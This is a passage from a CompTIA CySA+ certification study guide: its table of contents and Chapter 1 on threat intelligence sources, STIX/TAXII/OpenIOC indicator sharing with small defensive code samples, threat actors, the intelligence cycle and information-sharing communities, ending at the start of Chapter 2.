CompTIA Cybersecurity
Analyst (CySA+) CS0-002
Cert Guide
Troy McMillan
(troy.mcmillan@cybervista.net)
Contents at a Glance
1 The Importance of Threat Data and
Intelligence
2 Utilizing Threat Intelligence to Support
Organizational Security
3 Vulnerability Management Activities
4 Analyzing Assessment Output
5 Threats and Vulnerabilities Associated
with Specialized Technology
6 Threats and Vulnerabilities Associated
with Operating in the Cloud
7 Implementing Controls to Mitigate Attacks
and Software Vulnerabilities
8 Security Solutions for Infrastructure
Management
9 Software Assurance Best Practices
10 Hardware Assurance Best Practices
11 Analyzing Data as Part of Security
Monitoring Activities
12 Implementing Configuration Changes to
Existing Controls to Improve
Security
13 The Importance of Proactive Threat
Hunting
14 Automation Concepts and Technologies
15 The Incident Response Process
16 Applying the Appropriate Incident
Response Procedure
17 Analyzing Potential Indicators of
Compromise
18 Utilizing Basic Digital Forensics
Techniques
19 The Importance of Data Privacy and
Protection
20 Applying Security Concepts in Support of
Organizational Risk Mitigation
21 The Importance of Frameworks, Policies,
Procedures, and Controls
22 Final Preparation
Appendix A, Answers to the "Do I Know This
Already?" Quizzes and Review
Questions
Appendix B, CompTIA Cybersecurity Analyst
(CySA+) CS0-002 Cert Guide Exam
Updates
Glossary of Key Terms
Appendix C, Memory Tables
Appendix D, Memory Tables Answer Key
Appendix E, Study Planner
Contents
Chapter 1. The Importance of Threat Data
and Intelligence
“Do I Know This Already?” Quiz
Foundation Topics
Intelligence Sources
Indicator Management
Threat Classification
Threat Actors
Intelligence Cycle
Commodity Malware
Information Sharing and Analysis
Communities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 2. Utilizing Threat Intelligence to
Support Organizational Security
“Do I Know This Already?” Quiz
Foundation Topics
Attack Frameworks
Threat Research
Threat Modeling Methodologies
Threat Intelligence Sharing with Supported
Functions
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 3. Vulnerability Management
Activities
“Do I Know This Already?” Quiz
Foundation Topics
Vulnerability Identification
Validation
Remediation/Mitigation
Scanning Parameters and Criteria
Inhibitors to Remediation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 4. Analyzing Assessment Output
“Do I Know This Already?” Quiz
Foundation Topics
Web Application Scanner
Infrastructure Vulnerability Scanner
Software Assessment Tools and Techniques
Enumeration
Wireless Assessment Tools
Cloud Infrastructure Assessment Tools
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 5. Threats and Vulnerabilities
Associated with Specialized
Technology
“Do I Know This Already?” Quiz
Foundation Topics
Mobile
Internet of Things (IoT)
Embedded Systems
Real-Time Operating System (RTOS)
System-on-Chip (SoC)
Field Programmable Gate Array (FPGA)
Physical Access Control
Building Automation Systems
Vehicles and Drones
Workflow and Process Automation Systems
Industrial Control System (ICS)
Supervisory Control and Data Acquisition
(SCADA)
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 6. Threats and Vulnerabilities
Associated with Operating in the
Cloud
“Do I Know This Already?” Quiz
Foundation Topics
Cloud Deployment Models
Cloud Service Models
Function as a Service (FaaS)/Serverless
Architecture
Infrastructure as Code (IaC)
Insecure Application Programming Interface
(API)
Improper Key Management
Unprotected Storage
Logging and Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 7. Implementing Controls to
Mitigate Attacks and Software
Vulnerabilities
“Do I Know This Already?” Quiz
Foundation Topics
Attack Types
Vulnerabilities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 8. Security Solutions for
Infrastructure Management
“Do I Know This Already?” Quiz
Foundation Topics
Cloud vs. On-premises
Asset Management
Segmentation
Network Architecture
Change Management
Virtualization
Containerization
Identity and Access Management
Cloud Access Security Broker (CASB)
Honeypot
Monitoring and Logging
Encryption
Certificate Management
Active Defense
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 9. Software Assurance Best
Practices
Chapter 10. Hardware Assurance Best
Practices
“Do I Know This Already?” Quiz
Foundation Topics
Hardware Root of Trust
eFuse
Unified Extensible Firmware Interface
(UEFI)
Trusted Foundry
Secure Processing
Anti-Tamper
Self-Encrypting Drives
Trusted Firmware Updates
Measured Boot and Attestation
Bus Encryption
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 11. Analyzing Data as Part of
Security Monitoring Activities
Chapter 12. Implementing Configuration
Changes to Existing Controls to
Improve Security
“Do I Know This Already?” Quiz
Foundation Topics
Permissions
Whitelisting and Blacklisting
Firewall
Intrusion Prevention System (IPS) Rules
Data Loss Prevention (DLP)
Endpoint Detection and Response (EDR)
Network Access Control (NAC)
Sinkholing
Malware Signatures
Sandboxing
Port Security
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 13. The Importance of Proactive
Threat Hunting
“Do I Know This Already?” Quiz
Foundation Topics
Establishing a Hypothesis
Profiling Threat Actors and Activities
Threat Hunting Tactics
Reducing the Attack Surface Area
Bundling Critical Assets
Attack Vectors
Integrated Intelligence
Improving Detection Capabilities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 14. Automation Concepts and
Technologies
“Do I Know This Already?” Quiz
Foundation Topics
Workflow Orchestration
Scripting
Application Programming Interface (API)
Integration
Automated Malware Signature Creation
Data Enrichment
Threat Feed Combination
Machine Learning
Use of Automation Protocols and Standards
Continuous Integration
Continuous Deployment/Delivery
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 15. The Incident Response Process
“Do I Know This Already?” Quiz
Foundation Topics
Communication Plan
Response Coordination with Relevant
Entities
Factors Contributing to Data Criticality
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 16. Applying the Appropriate
Incident Response Procedure
“Do I Know This Already?” Quiz
Foundation Topics
Preparation
Detection and Analysis
Containment
Eradication and Recovery
Post-Incident Activities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 17. Analyzing Potential Indicators of
Compromise
“Do I Know This Already?” Quiz
Foundation Topics
Network-Related Indicators of Compromise
Host-Related Indicators of Compromise
Application-Related Indicators of
Compromise
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 18. Utilizing Basic Digital Forensics
Techniques
“Do I Know This Already?” Quiz
Foundation Topics
Network
Endpoint
Mobile
Cloud
Virtualization
Legal Hold
Procedures
Hashing
Carving
Data Acquisition
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 19. The Importance of Data Privacy
and Protection
“Do I Know This Already?” Quiz
Foundation Topics
Privacy vs. Security
Non-technical Controls
Technical Controls
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 20. Applying Security Concepts in
Support of Organizational Risk
Mitigation
“Do I Know This Already?” Quiz
Foundation Topics
Business Impact Analysis
Risk Identification Process
Risk Calculation
Communication of Risk Factors
Risk Prioritization
Systems Assessment
Documented Compensating Controls
Training and Exercises
Supply Chain Assessment
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 21. The Importance of Frameworks,
Policies, Procedures, and Controls
Chapter 22. Final Preparation
Exam Information
Getting Ready
Tools for Final Preparation
Suggested Plan for Final Review/Study
Summary
Appendix A. Answers to the “Do I Know This
Already?” Quizzes and Review
Questions
Appendix B. CompTIA Cybersecurity
Analyst (CySA+) CS0-002 Cert
Guide Exam Updates
Glossary of Key Terms
Appendix C. Memory Tables
Appendix D. Memory Tables Answer Key
Appendix E. Study Planner
Chapter 1. The Importance
of Threat Data and
Intelligence
This chapter covers the following topics related
to Objective 1.1 (Explain the importance of threat
data and intelligence) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Intelligence sources: Examines open-source
intelligence, proprietary/closed-source
intelligence, timeliness, relevancy, and accuracy
• Confidence levels: Covers the importance of
identifying levels of confidence in data
• Indicator management: Introduces Structured
Threat Information eXpression (STIX), Trusted
Automated eXchange of Indicator Information
(TAXII), and OpenIOC
• Threat classification: Investigates known
threats vs. unknown threats, zero-day threats, and
advanced persistent threats
• Threat actors: Identifies actors such as nation-state, hacktivist, organized crime, and intentional and unintentional insider threats
• Intelligence cycle: Explains the requirements,
collection, analysis, dissemination, and feedback
stages
• Commodity malware: Describes the types of
malware that commonly infect networks
• Information sharing and analysis
communities: Discusses data sharing among
members of healthcare, financial, aviation,
government, and critical infrastructure
communities
When a war is fought, the gathering and processing of
intelligence information is critical to the success of a
campaign. Likewise, when conducting the daily war that
comprises the defense of an enterprise’s security, threat
intelligence can be the difference between success and
failure. This opening chapter discusses the types of
threat intelligence, the sources and characteristics of
such data, and common threat classification systems.
This chapter also discusses the threat cycle, common
malware, and systems of information sharing among
enterprises.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these seven self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 1-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 1-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure
of the answer, you should mark that question as wrong for purposes of the self-assessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. Which of the following is an example of closed-source intelligence?
a. Internet blogs and discussion groups
b. Print and online media
c. Unclassified government data
d. Platforms maintained by private organizations
2. Which of the following is an application protocol
for exchanging cyber threat information over
HTTPS?
a. TAXII
b. STIX
c. OpenIOC
d. OSINT
3. Which of the following are threats discovered in
live environments that have no current fix or
patch?
a. Known threats
b. Zero-day threats
c. Unknown threats
d. Advanced persistent threats
4. Which of the following threat actors uses attacks as
a means to get their message out and affect the
businesses that they feel are detrimental to their
cause?
a. Organized crime
b. Terrorist group
c. Hacktivist
d. Insider threat
5. In which stage of the intelligence cycle does most of
the hard work occur?
a. Requirements
b. Collection
c. Dissemination
d. Analysis
6. Malware that is widely available for either purchase
or by free download is called what?
a. Advanced
b. Commodity
c. Bulk
d. Proprietary
7. Which of the following information sharing and
analysis communities is driven by the requirements
of HIPAA?
a. H-ISAC
b. Financial Services Information Sharing and
Analysis Center
c. Aviation Government Coordinating Council
d. ENISA
FOUNDATION TOPICS
INTELLIGENCE SOURCES
Threat intelligence comes in many forms and can be
obtained from a number of different sources. When
gathering this critical data, the security professional
should always classify the information with respect to its
timeliness and relevancy. Let’s look at some types of
threat intelligence and the process of attaching a
confidence level to the data.
Open-Source Intelligence
Open-source intelligence (OSINT) consists of
information that is publicly available to everyone, though
not everyone knows that it is available. OSINT comes
from public search engines, social media sites,
newspapers, magazine articles, or any source that does
not limit access to that information. Examples of these
sources include the following:
• Print and online media
• Internet blogs and discussion groups
• Unclassified government data
• Academic and professional publications
• Industry group data
• Papers and reports that are unpublished (gray
data)
Proprietary/Closed-Source
Intelligence
Proprietary/closed-source intelligence sources
are those that are not publicly available and usually
require a fee to access. Examples of these sources are
platforms maintained by private organizations that
supply constantly updating intelligence information. In
many cases this data is developed from all of the
provider’s customers and other sources.
An example of such a platform is offered by CYFIRMA, a market leader in predictive cyber threat visibility and intelligence. In 2019, CYFIRMA announced the launch of its cloud-based Cyber Intelligence Analytics Platform (CAP) v2.0, which uses proprietary artificial intelligence and machine learning algorithms to help organizations unravel cyber risks and threats and enable proactive cyber posture management.
Timeliness
One of the considerations when analyzing intelligence
data (of any kind, not just cyber data) is the timeliness
of such data. Obviously, if an organization receives threat
data that is two weeks old, quite likely it is too late to
avoid that threat. One of the attractions of closed-source
intelligence is that these platforms typically provide near
real-time alerts concerning such threats.
Relevancy
Intelligence data can be quite voluminous. The vast
majority of this information is irrelevant to any specific
organization. One of the jobs of the security professional
is to ascertain which data is relevant and which is not.
Again, many proprietary platforms allow for searching
and organizing the data to enhance its relevancy.
Confidence Levels
While timeliness and relevancy are key characteristics to
evaluate with respect to intelligence, the security
professional must also make an assessment as to the
confidence level attached to the data. That is, can it be
relied on to predict the future or to shed light on the
past? On a more basic level, is it true? Or was the data
developed to deceive or mislead? Many cyber activities
have as their aim to confuse, deceive, and hide activities.
Accuracy
Finally, the security professional must determine
whether the intelligence is correct (accuracy).
Newspapers are full these days of cases of false intelligence. The most basic example is the hoax email containing a false warning of a malware infection on the local device. While the warning is false, in many cases it motivates the user to follow a link to free software that actually installs malware. Again, many cyber attacks use
false information to misdirect network defenses.
INDICATOR MANAGEMENT
Cybersecurity professionals use indicators of
compromise (IOC) to identify potential threats. IOCs are
network events that are known to either precede or
accompany an attack of some sort. Managing the
collection and analysis of these indicators can be a major
headache. Indicator management systems have been
developed to make this process somewhat easier. These
systems also provide insight into indicators present in
other networks that may not yet be present in your
enterprise, providing somewhat of an early-warning
system. Let’s look at some examples of these platforms.
Structured Threat Information
eXpression (STIX)
Structured Threat Information eXpression
(STIX) is an XML-based programming language that
can be used to communicate cybersecurity data among
those using the language. It provides a common language
for this communication.
STIX was created with several core purposes in mind:
• To identify patterns that could indicate cyber
threats
• To help facilitate cyber threat response activities,
including prevention, detection, and response
• The sharing of cyber threat information within an
organization and with outside partners or
communities that benefit from the information
While STIX was originally sponsored by the Office of
Cybersecurity and Communications (CS&C) within the
U.S. Department of Homeland Security (DHS), it is now
under the management of the Organization for the
Advancement of Structured Information Standards
(OASIS), a nonprofit consortium that seeks to advance
the development, convergence, and adoption of open
standards for the Internet.
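While the original STIX 1.x expressed indicators in XML, the current STIX 2.x standard serializes objects as JSON. The following minimal Python sketch builds a STIX 2.1 indicator for a known-bad domain; the domain name and indicator values are hypothetical placeholders, not real threat data.

```python
import json
import uuid
from datetime import datetime, timezone

# A minimal STIX 2.1 Indicator object (STIX 2.x serializes to JSON rather
# than the XML used by STIX 1.x). All values here are hypothetical.
now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
indicator = {
    "type": "indicator",
    "spec_version": "2.1",
    "id": f"indicator--{uuid.uuid4()}",
    "created": now,
    "modified": now,
    "name": "Known botnet C2 domain",
    # STIX patterning language: match a domain-name observable
    "pattern": "[domain-name:value = 'evil.example.com']",
    "pattern_type": "stix",
    "valid_from": now,
}

print(json.dumps(indicator, indent=2))
```

Because every producer and consumer agrees on this object layout and patterning language, indicators like this one can be exchanged between organizations without custom parsing on each end.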
Trusted Automated eXchange of
Indicator Information (TAXII)
Trusted Automated eXchange of Indicator
Information (TAXII) is an application protocol for
exchanging cyber threat information (CTI) over HTTPS.
It defines two primary services, Collections and
Channels. Figure 1-1 shows the Collection service. A
Collection is an interface to a logical repository of CTI
objects provided by a TAXII Server that allows a
producer to host a set of CTI data that can be requested
by consumers: TAXII Clients and Servers exchange
information in a request-response model.
Figure 1-1 Collection Service
Figure 1-2 shows a Channel service. Maintained by a
TAXII Server, a Channel allows producers to push data
to many consumers and allows consumers to receive data
from many producers: TAXII Clients exchange
information with other TAXII Clients in a publish-subscribe model.
Figure 1-2 Channel Service
These TAXII services can support a variety of common
sharing models:
• Hub and spoke: One central clearinghouse
• Source/subscriber: One organization is the
single source of information
• Peer-to-peer: Multiple organizations share their
information
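As a concrete illustration of the request-response (Collection) model described above, the following sketch uses the third-party requests library to pull CTI objects from a TAXII 2.1 Collection over HTTPS. The server URL, collection ID, and credentials are hypothetical placeholders for whatever a real TAXII server would provide.

```python
import requests

# Hypothetical TAXII 2.1 server and collection ID -- substitute real values.
BASE = "https://taxii.example.com/api1"
COLLECTION = "91a7b528-80eb-42ed-a74d-c6fbd5a26116"

# TAXII 2.1 content is negotiated with this media type.
headers = {"Accept": "application/taxii+json;version=2.1"}

# Request-response model: a TAXII Client pulls CTI objects from a Collection.
resp = requests.get(
    f"{BASE}/collections/{COLLECTION}/objects/",
    headers=headers,
    auth=("analyst", "password"),  # most servers require authentication
    timeout=30,
)
resp.raise_for_status()

# The response envelope's "objects" member holds STIX objects (e.g., indicators).
for obj in resp.json().get("objects", []):
    print(obj["type"], obj["id"])
```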
OpenIOC
OpenIOC (Open Indicators of Compromise) is an open
framework designed for sharing threat intelligence
information in a machine-readable format. It is a simple
framework that is written in XML, which can be used to
document and classify forensic artifacts. It comes with a
base set of 500 predefined indicators, as provided by
Mandiant (a U.S. cybersecurity firm later acquired by
FireEye).
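Because OpenIOC documents are plain XML, they can be processed with standard tooling. The following sketch parses a simplified OpenIOC-style document with Python's standard XML library; real OpenIOC files carry Mandiant schema namespaces and richer metadata, so treat this structure as illustrative only.

```python
import xml.etree.ElementTree as ET

# A simplified OpenIOC-style document (real OpenIOC files carry Mandiant
# schema namespaces and additional metadata; this is a minimal illustration).
DOC = """
<ioc id="example-ioc-1">
  <short_description>Suspicious dropper</short_description>
  <definition>
    <Indicator operator="OR">
      <IndicatorItem condition="is">
        <Context search="FileItem/Md5sum"/>
        <Content type="md5">d41d8cd98f00b204e9800998ecf8427e</Content>
      </IndicatorItem>
      <IndicatorItem condition="contains">
        <Context search="Network/DNS"/>
        <Content type="string">evil.example.com</Content>
      </IndicatorItem>
    </Indicator>
  </definition>
</ioc>
"""

root = ET.fromstring(DOC)
print("IOC:", root.findtext("short_description"))
# Walk the indicator terms: each item names an artifact to test and a value.
for item in root.iter("IndicatorItem"):
    context = item.find("Context").get("search")
    content = item.findtext("Content")
    print(f"  {context} {item.get('condition')} {content!r}")
```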
THREAT CLASSIFICATION
After threat data has been collected through a
vulnerability scan or through an alert, it must be
correlated to an attack type and classified as to its
severity and scope, based on how widespread the
incident appears to be and the types of data that have
been put at risk. This helps in the prioritization process.
Much as in the triage process in a hospital, incidents are
not handled in the order in which they are received or
detected; rather, the most dangerous issues are
addressed first, and prioritization occurs constantly.
When determining vulnerabilities and threats to an
asset, considering the threat actors first is often easiest.
Threat actors can be grouped into the following six
categories:
• Human: Includes both malicious and
nonmalicious insiders and outsiders, terrorists,
spies, and terminated personnel
• Natural: Includes floods, fires, tornadoes,
hurricanes, earthquakes, and other natural
disasters or weather events
• Technical: Includes hardware and software
failure, malicious code, and new technologies
• Physical: Includes CCTV issues, perimeter
measures failure, and biometric failure
• Environmental: Includes power and other
utility failure, traffic issues, biological warfare,
and hazardous material issues (such as spillage)
• Operational: Includes any process or procedure
that can affect confidentiality, integrity, and
availability (CIA)
When the vulnerabilities and threats have been
identified, the loss potential for each must be
determined. This loss potential is determined by using
the likelihood of the event combined with the impact that
such an event would cause. An event with a high
likelihood and a high impact would be given more
importance than an event with a low likelihood and a low
impact. Different types of risk analysis should be used to
ensure that the data that is obtained is maximized. Once
an incident has been placed into one of these
classifications, options that are available for that
classification are considered. The following sections look
at three common classifications that are used.
Known Threat vs. Unknown Threat
In the cybersecurity field, known threats are threats
that are common knowledge and easily identified
through signatures by antivirus and intrusion detection
system (IDS) engines or through domain reputation
blacklists. Unknown threats, on the other hand, are
lurking threats that may have been identified but for
which no signatures are available. We are not completely
powerless against these threats. Many security products
attempt to locate these threats through static and
dynamic file analysis. This may occur in a sandboxed
environment, which protects the system that is
performing the analysis. In some cases, unknown threats
are really old threats that have been recycled. Because
security products have limited memory with regard to
threat signatures, vendors must choose the most current
attack signatures to include. Therefore, old attack
signatures may be missing in newer products, which
effectively allows old known threats to reenter the
unknown category.
Zero-day
In many cases, vulnerabilities discovered in live
environments have no current fix or patch. Such a
vulnerability is referred to as a zero-day vulnerability. The best way to prevent zero-day attacks is to write bug-free applications by implementing efficient design, coding, and testing practices. Having staff discover zero-day vulnerabilities is much better than having those looking to exploit the vulnerabilities find them.
Monitoring known hacking community websites can
often help you detect attacks early because hackers often
share zero-day exploit information.
Honeypots or honeynets can also provide forensic
information about hacker methods and tools for zero-day
attacks. New zero-day attacks against a broad range of
technology systems are announced on a regular basis. A
security manager should create an inventory of
applications and maintain a list of critical systems to
manage the risks of these attack vectors.
Because zero-day attacks occur before a fix or patch has
been released, preventing them is difficult. As with many
other attacks, keeping all software and firmware up to
date with the latest updates and patches is important.
Enabling audit logging of network traffic can help
reconstruct the path of a zero-day attack. Security
professionals can inspect logs to determine the presence
of an attack in the network, estimate the damage, and
identify corrective actions. Zero-day attacks usually
involve activity that is outside “normal” activity, so
documenting normal activity baselines is important.
Also, routing traffic through a central internal security
service can ensure that any fixes affect all the traffic in
the most effective manner. Whitelisting can also aid in
mitigating attacks by ensuring that only approved
entities are able to use certain applications or complete
certain tasks. Finally, security professionals should
ensure that the organization implements the appropriate
backup schemes to ensure that recovery can be achieved,
thereby providing remediation from the attack.
Advanced Persistent Threat
An advanced persistent threat (APT) is a hacking
process that targets a specific entity and is carried out
over a long period of time. In most cases, the victim of an
APT is a large corporation or government entity. The
attacker is usually an organized, well-funded group of
highly skilled individuals, sometimes sponsored by a
nation-state. The attackers have a predefined objective.
Once the objective is met, the attack is halted. APTs can
often be detected by monitoring logs and performance
metrics. While no defensive actions are 100% effective,
the following actions may help mitigate many APTs:
• Use application whitelisting to help prevent
malicious software and unapproved programs
from running.
• Patch applications such as Java, PDF viewers,
Flash, web browsers, and Microsoft Office
products.
• Patch operating system vulnerabilities.
• Restrict administrative privileges to operating
systems and applications, based on user duties.
THREAT ACTORS
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or
absent access control list (ACL) is a threat actor. Keep in
mind, though, that threat actors can discover and/or
exploit vulnerabilities. Not all threat actors will actually
exploit an identified vulnerability.
The Federal Bureau of Investigation (FBI) has identified
three categories of threat actors: nation-state or state sponsors, organized crime, and terrorist groups.
Nation-state
Nation-state or state sponsors are usually foreign
governments. They are interested in pilfering data,
including intellectual property and research and
development data, from major manufacturers, tech
companies, government agencies, and defense
contractors. They have the most resources and are the
best organized of any of the threat actor groups.
Organized Crime
Organized crime groups primarily threaten the financial
services sector and are expanding the scope of their
attacks. They are well financed and organized.
Terrorist Groups
Terrorist groups want to impact countries by using the
Internet and other networks to disrupt or harm the
viability of a society by damaging its critical
infrastructure.
Hacktivist
While not mentioned by the FBI, hacktivists are activists
for a cause, such as animal rights, that use hacking as a
means to get their message out and affect the businesses
that they feel are detrimental to their cause.
Insider Threat
Insider threats should be one of the biggest concerns for
security personnel. Insiders have knowledge of and
access to systems that outsiders do not have, giving
insiders a much easier avenue for carrying out or
participating in an attack. An organization should
implement the appropriate event collection and log
review policies to provide the means to detect insider
threats as they occur. These threats fall into two
categories, intentional and unintentional.
Intentional
Intentional insider threats are insiders who have ill
intent. These folks typically either are disgruntled over
some perceived slight or are working for another
organization to perform corporate espionage. They may
share sensitive documents with others or they may
impart knowledge used to breach a network. This is one
of the reasons that users’ permissions and rights must
not exceed those necessary to perform their jobs. This
helps to limit the damage an insider might inflict.
Unintentional
Sometimes internal users unknowingly increase the
likelihood that security breaches will occur. Such
unintentional insider threats do not have malicious
intent; they simply do not understand how system
changes can affect security.
Security awareness and training should include coverage
of examples of misconfigurations that can result in
security breaches occurring and/or not being detected.
For example, a user may temporarily disable antivirus
software to perform an administrative task. If the user
fails to reenable the antivirus software, he unknowingly
leaves the system open to viruses. In such a case, an
organization should consider implementing group
policies or some other mechanism to periodically ensure
that antivirus software is enabled and running. Another
solution could be to configure antivirus software to
automatically restart after a certain amount of time.
Recording and reviewing user actions via system, audit,
and security logs can help security professionals identify
misconfigurations so that the appropriate policies and
controls can be implemented.
INTELLIGENCE CYCLE
Intelligence activities of any sort, including cyber
intelligence functions, should follow a logical process
developed over years by those in the business. The
intelligence cycle model specified in exam objective 1.1
contains five stages:
1. Requirements: Before beginning intelligence
activities, security professionals must identify what
the immediate issue is and define as closely as
possible the requirements of the information that
needs to be collected and analyzed. This means the
types of data to be sought are driven by the types of
issues with which we are concerned. The amount of
potential information may be so vast that unless we
filter it to what is relevant, we may be unable to
fully understand what is occurring in the
environment.
2. Collection: This is the stage in which most of the
hard work occurs. It is also the stage at which
recent advances in artificial intelligence (AI) and
automation have changed the game. Collection is
time-consuming work that involves web searches,
interviews, identifying sources, and monitoring, to
name a few activities. New tools automate data
searching, organizing, and presenting information
in easy-to-view dashboards.
3. Analysis: In this stage, data is combed and
analyzed to identify pieces of information that have
the following characteristics:
• Timely: Can be tied to the issue from a time
standpoint
• Actionable: Suggests or leads to a proper
mitigation
• Consistent: Reduces uncertainty surrounding
an issue
This is the stage in which the skills of the security
professional have the most impact, because the ability to
correlate data with issues requires keen understanding of
vulnerabilities, their symptoms, and solutions.
4. Dissemination: Hopefully analysis leads to a
solution or set of solutions designed to prevent
issues. These solutions, be they policies, scripts, or
configuration changes, must be communicated to
the proper personnel for deployment. The security
professional acts as the designer and the network
team acts as the builder of the solution. In the case
of policy changes, the human resources (HR) team
acts as the builder.
5. Feedback: Gathering feedback on the intelligence
cycle before the next cycle begins is important so
that improvements can be defined. What went
right? What worked? What didn’t? Was the
analysis stage performed correctly? Was the
dissemination process clear and timely?
Improvements can almost always be identified.
COMMODITY MALWARE
Commodity malware is malware that is widely
available either for purchase or by free download. It is
not customized or tailored to a specific attack. It does not
require complete understanding of its processes and is
used by a wide range of threat actors with a range of skill
levels. Although no clear dividing line exists between
commodity malware and what is called advanced
malware (and in fact the lines are blurring more all the
time), generally we can make a distinction based on the
skill level and motives of the threat actors who use the
malware. Less-skilled threat actors (script kiddies, etc.)
utilize these prepackaged commodity tools, whereas
more-skilled threat actors (APTs, etc.) typically
customize their attack tools to make them more effective
in a specific environment. The motives of those who
employ commodity malware tend to be gaining
experience in hacking and experimentation.
INFORMATION SHARING
AND ANALYSIS
COMMUNITIES
Over time, security professionals have developed
methods and platforms for sharing the cybersecurity
information they have developed. Some information
sharing and analysis communities focus on specific
industries while others simply focus on critical issues
common to all:
• Healthcare: In the healthcare community, where
protection of patient data is legally required by the
Health Insurance Portability and Accountability
Act (HIPAA), an example of a sharing platform is
the Health Information Sharing and Analysis
Center (H-ISAC). It is a global operation focused
on sharing timely, actionable, and relevant
information among its members, including
intelligence on threats, incidents, and
vulnerabilities. This sharing of information can be
done on a human-to-human or machine-to-machine basis.
• Financial: The financial services sector is under
pressure to protect financial records with laws
such as the Financial Services Modernization Act
of 1999, commonly known as the Gramm-Leach-Bliley Act (GLBA). The Financial Services Information Sharing and Analysis Center (FS-ISAC) is an industry consortium dedicated to
reducing cyber risk in the global financial system.
It shares among its members and trusted sources
critical cyber intelligence, and builds awareness
through summits, meetings, webinars, and
communities of interest.
• Aviation: In the area of aviation, the U.S.
Department of Homeland Security’s Cybersecurity
and Infrastructure Security Agency (CISA)
maintains a number of chartered organizations,
among them the Aviation Government
Coordinating Council (AGCC). Its charter
document reads “The AGCC coordinates
strategies, activities, policy and communications
across government entities within the Aviation
Sub-Sector. The AGCC acts as the government
counterpart to the private industry-led ‘Aviation
Sector Coordinating Council’ (ASCC).” The
Aviation Sector Coordinating Council is an
example of a private sector counterpart.
• Government: For government agencies, the
aforementioned CISA also shares information
with state, local, tribal, and territorial
governments and with international partners, as
cybersecurity threat actors are not constrained by
geographic boundaries. As CISA describes itself
on the Department of Homeland Security website,
“CISA is the Nation’s risk advisor, working with
partners to defend against today’s threats and
collaborating to build more secure and resilient
infrastructure for the future.”
• Critical infrastructure: All of the previously
mentioned platforms and organizations are
dedicated to helping organizations protect their
critical infrastructure. As an example of
international cooperation, the European Union
Agency for Network and Information Security
(ENISA) is a center of network and information
security expertise for the European Union (EU).
ENISA describes itself as follows: “ENISA works
with these groups to develop advice and
recommendations on good practice in information
security. It assists Member States in
implementing relevant EU legislation and works
to improve the resilience of Europe’s critical
information infrastructure and networks. ENISA
seeks to enhance existing expertise in member
states by supporting the development of cross-border communities committed to improving
network and information security throughout the
EU.” More information about ENISA and its work
can be found at https://www.enisa.europa.eu.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 1-2 lists a reference of these key topics and the
page number on which each is found.
Table 1-2 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
open-source intelligence
proprietary/closed-source intelligence
timeliness
relevancy
confidence levels
accuracy
indicator management
Structured Threat Information eXpression (STIX)
Trusted Automated eXchange of Indicator Information
(TAXII)
OpenIOC
known threats
unknown threats
zero-day threats
advanced persistent threat
collection
analysis
dissemination
commodity malware
REVIEW QUESTIONS
1. Give at least two examples of open-source
intelligence data.
2. ________________ is an open framework that
is designed for sharing threat intelligence
information in a machine-readable format.
3. Match the following items with the correct
definition.
4. Which threat actor has already performed network
penetration?
5. List the common sharing models used in TAXII.
6. ________________are hacking for a cause,
such as for animal rights, and use hacking as a
means to get their message out and affect the
businesses that they feel are detrimental to their
cause.
7. Match the following items with their definition.
8. APT attacks are typically sourced from which group
of threat actors?
9. What intelligence gathering step is necessary
because the amount of potential information may
be so vast?
10. The Aviation Government Coordinating Council is
chartered by which organization?
Chapter 2. Utilizing Threat
Intelligence to Support
Organizational Security
This chapter covers the following topics related
to Objective 1.2 (Given a scenario, utilize threat
intelligence to support organizational security)
of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
• Attack frameworks: Introduces the MITRE
ATT&CK framework, the Diamond Model of
Intrusion Analysis, and the kill chain
• Threat research: Covers reputational and
behavioral research, indicators of compromise
(IoC), and the Common Vulnerability Scoring
System (CVSS)
• Threat modeling methodologies: Discusses
the concepts of adversary capability, total attack
surface, attack vector, impact, and likelihood
• Threat intelligence sharing with supported
functions: Describes intelligence sharing with
the functions incident response, vulnerability
management, risk management, security
engineering, and detection and monitoring
Threat intelligence comprises information gathered that
